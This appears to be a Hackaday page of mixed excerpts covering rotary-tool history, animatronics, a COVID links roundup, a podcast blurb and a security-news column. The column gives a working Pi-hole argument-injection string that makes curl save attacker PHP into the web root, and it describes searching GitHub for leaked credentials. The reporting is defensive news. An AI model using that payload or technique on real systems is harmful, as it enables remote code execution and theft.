This excellent content from the Hackaday writing crew highlights recurring topics and popular series like Linux-Fu, 3D-Printering, Hackaday Links, This Week in Security, Inputs of Interest, Profiles in Science, Retrotechtacular, Ask Hackaday, Teardowns, Reviews, and many more.
Albert Dremel developed the now famous rotary tool and started the company in 1932 to make blade sharpeners. It would be 1935 before the company produced the Moto-Tool which is mostly recognizable as an ancestor of the modern Dremel.
Dremel achieved such dominance that today the name is synonymous with rotary tools in the same way Xerox means photocopy and Crock-Pot is any slow cooker. Sure, there are knock offs you can get from the usual cheap tool outlets, but generally, people reach for a Dremel even when it isn’t really one. Today that tool might really be a Black and Decker or a Dewalt or even a cheap brand like Wen or Chicago Electric. But in the first half of the 20th century, you might have reached for a Handee.
A Whole Shop Full of Tools
The Handee was a product of the Chicago Wheel and Manufacturing Company who, in 1937, billed it as “a whole shop full of tools in one,” as you can see in this ad. While $10.75 might sound like a price for a Harbor Freight cheapie tool, adjusted for inflation that’s around $200 in 2020 money. At least for that price you got three free accessories out of the over 200 available.
I didn’t remember the Handee and I wanted to see if I could figure out what happened to it and the company who made it. After all, with the Internet at your disposal, how hard could it be? Turns out, I did learn a lot, but in the end, tracing down a company like this from the old days isn’t always as easy as you might think.
Join us on Wednesday, May 20 at noon Pacific for the Animatronics Hack Chat with Will Cogley!
While robots have only a made a comparatively recent appearance on the technology timeline, people have been building mechanical simulations of living organisms for a long time indeed. For proof, one needs only to look back at the automatons built by clever craftsmen to amuse and delight their kings and queens. The clockwork mechanisms that powered fanciful birds and animals gave way to the sophisticated dolls and mannequins that could perform complex tasks like writing and performing music, all with the goal of creating something that looked and acted like it was alive.
Once the age of electronics came around, the springs that drove the early automatons and the cams that programmed their actions were replaced by motors and control circuits. New materials made once-clunky mechanisms finer and more precise, sensors and servos made movements more lifelike, and the age of animatronics was born.
Animatronics have since become a huge business, mostly in the entertainment industry. From robotic presidents to anachronistic dinosaurs to singing rodents designed to sell pizza, animatronics have been alternately entertaining and terrifying us for decades. The fact that they’re not “real” robots doesn’t make the melding of mechanical, electrical, and computer systems into a convincing representation of a real being any less challenging. Will Cogley has more than a few amazing animatronic designs under his belt, some of which we’ve featured on Hackaday. From hearts to hands to slightly terrifying mouths, Will puts a ton of work into his mechanisms, and he’ll stop by the Hack Chat to tell us all about designing and building animatronics.
Click that speech bubble to the right, and you’ll be taken directly to the Hack Chat group on Hackaday.io. You don’t have to wait until Wednesday; join whenever you want and you can see what the community is talking about.
Consider it the “Scarlet Letter” of our time. An MIT lab is developing a face mask that lights up to alert others when the wearer has COVID-19. The detection technology is based on sensors that were developed for the Ebola virus scare and uses fluorescently tagged DNA fragments freeze-dried onto absorbent strips built into the mask. The chemistry is activated by the moisture in the sputum expelled when the wearer coughs or sneezes while wearing the mask; any SARS-CoV-2 virus particles in the sputum bind to the strips, when then light up under UV. The list of problems a scheme like this entails is long and varied, not least of which is what would possess someone to willingly don one of these things. Still, it’s an interesting technology.
Speaking of intrusive expansions of the surveillance state, Singapore is apparently now using a Boston Dynamics Spot robot to enforce social-distancing rules in its public parks and gardens. The familiar four-legged, bright yellow dog-bot is carrying cameras that are relaying images of park attendees to some sort of image analysis program and are totally not capturing facial or personal data, pinky swear. If people are found to be violating the two-meter rule, Spot will bark out a prerecorded reminder to spread out a bit. How the system differentiates between people who live together who are out getting some fresh air and strangers who should be staying apart, and whether the operators of this have ever seen how this story turns out are open questions.
Those who lived through 9/11 in the United States no doubt remember the deafening silence that descended over the country for three days while every plane in the civil aviation fleet was grounded. One had no idea how much planes contributed to the noise floor of life until they were silenced. So too with the lockdown implemented worldwide to deal with the COVID-19 pandemic, except with the sometimes dramatic reduction in pollution levels. We’ve all seen pictures where people suddenly realize that Los Angeles isn’t necessarily covered by an orange cloud of smog, and that certain mountain ranges are actually visible if you care to look. But getting some hard data is always useful, and these charts show just how much the pollution situation improved in a number of countries throughout the world after their respective lockdowns. For some cities, the official lockdown was a clear demarcation between the old pollution regime and the new, but for some, there was an obvious period before the lockdown was announced where people were obviously curtailing their activity. It’s always interesting pore over data like this and speculated what it all means.
While the in-person aspects of almost every conference under the sun have been canceled, many of them have switched to a virtual meeting that can at least partially make up for the full experience. And coming up next weekend is Virtually Maker Faire, in the slot where Bay Area Maker Faire would normally be offered. The call for makers ends today, so get your proposals in and sign up to attend.
And finally, there aren’t too many times in life you’ll get a chance to get to visualize a number so large that an Evil Empire was named for it. The googol, or 10100, was a term coined by the nine-year-old nephew of mathematician Edward Kasner when he asked the child for a good name for a really big number. To put the immensity of that number into perspective, The Brick Experiment Channel on YouTube put together an improbably long gear train using Lego pieces we’ve never seen before with a reduction ratio of 10103.4:1. The gear train has a ton of different power transmission elements in it, from plain spur gears to worm drives and even planetary gears. We found the 2608.5:1 harmonic gear particularly fascinating. There’s enough going on to keep even a serious gearhead entertained, but perhaps not for the 5.2×1091 years it’ll take to revolve the final gear once. Something, something, heat-death of the universe. [Ed note: prior art, which we were oddly enough thinking of fondly just a few days ago. Synchronicity!]
Some of the coolest hacks do a lot with a little. I was just re-watching a video from [Homo Faciens], who after building a surprisingly capable CNC machine out of junk-bin parts and a ton of ingenuity, was accidentally challenged by Hackaday’s own [Dan Maloney] to take it a step further. [Dan] was only joking when he asked “Can anyone build a CNC machine out of cardboard and paperclips?”, but then [Homo Faciens] replied: cardboard and paperclip CNC plotter. Bam!
My favorite part of the cardboard project is not just the clever “encoder wheel” made of a bolt dipped in epoxy, with enough scraped off that it contacts a paperclip once per rotation. Nor was it the fairly sophisticated adjustable slides and ways that he built to mimic the functionality of the real deal. Nope.
My favorite part of this project is [Norbert] explaining that the machine has backlash here, and it’s got play there, due to frame flex. It is a positive feature of the machine. The same flaws that a full-metal machine would have are all present here, but due to the cheesy construction materials, you can see them with the naked eye instead of requiring a dial indicator. Because it wiggles visible tenths of an inch where a professional mill would wiggle invisible thousandths, that helps you build up intuition for the system.
This device isn’t a “prototype” because there’s no way [Norbert] intends it for serious use. But it surely isn’t just a “toy” either. “Instructional model” makes it sound like a teaching aid, created by a know-it-all master, intended to be consumed by students. If anything, there’s a real sense of exploration, improvisation, and straight-up hacking in this project. I’m sure [Norbert] learned as much from the challenge as we did from watching him tackle it. And it also captures the essence of hacking: doing something unexpected with tech.
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter.
Want this type of article to hit your inbox every Friday morning? You should sign up!
Hackaday editors Mike Szczys and Elliot Williams explore the coolest hacks of the past 168 hours. The big news this week: will Wink customers pony up $5 a month to turn their lights on and off? There’s a new open source design for a pick and place machine. You may not have a Vectrex gaming console, but there’s a scratch-built board that can turn you oscilloscope into one. And you just can’t miss this LED sign technology that programs every pixel using projection mapping.
Take a look at the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
Thunderspy was announced this week, developed by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into Firewire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, the hardware DMA was entirely independent of software, so it was possible to debug a crashed kernel over firewire.
Once the vulnerability was made public, hardware and software vendors have taken steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation against the attacks. A user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or thunderbolt device, and read the firmware directly off the thunderbolt controller. That firmware can be modified and re-uploaded. One of the simplest attacks that enables is turning the security level to its lowest setting.
It’s interesting research, and there are fixes coming or already in place to mitigate the problems found. The real question is how much Thunderspy matters. The threat model is the evil maid: A laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other potentially better attack options. There is a narrow circumstance where Thunderspy is the perfect technique: A device with an encrypted drive, that’s been powered on and logged into, but locked. In this case, Thunderspy could be used to recover the drive encryption key stored in memory, and then used to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component to their sign-on SDK, which caused many apps that made use of that SDK to crash. It’s worth asking if it’s a good idea for so many popular apps to use Facebook code. There doesn’t appear to have been a vulnerability or path to compromise other than the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack, in a campaign targeting a variety of vulnerabilities. The general attack strategy is to inject a malicious javscript that lays dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
Godaddy Breaches
Godaddy users were recently informed that there was a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019, and wasn’t discovered for 6 months. Godaddy has stated that there wasn’t any evidence of any malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple, just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized. Your PHP code is saved in the web directory, and an HTTP request triggers that code.
Leaking on Github
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties, simply by searching Github for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things. vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password in on the command line, thinking you were authenticating with SSH or sudo, just for an example? It’s an easy mistake to make, to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us, make sure to sanitize projects before pushing code to Github.
For many of us, our passion for electronics and science originated with curiosity about some device, a computer, radio, or even a car. The subject of this book has just such an origin. However, how many of us made this discovery and pursued this path during times of hunger or outright famine?
That’s the remarkable story of William Kamkwamba that’s told in the book, The Boy Who Harnessed the Wind. Remarkable because it culminates with his building a windmill (more correctly called a wind turbine) that powered lights in his family’s house all by the young age of fifteen. As you’ll see, it’s also the story of an unyielding thirst for knowledge in the face of famine and doubt by others.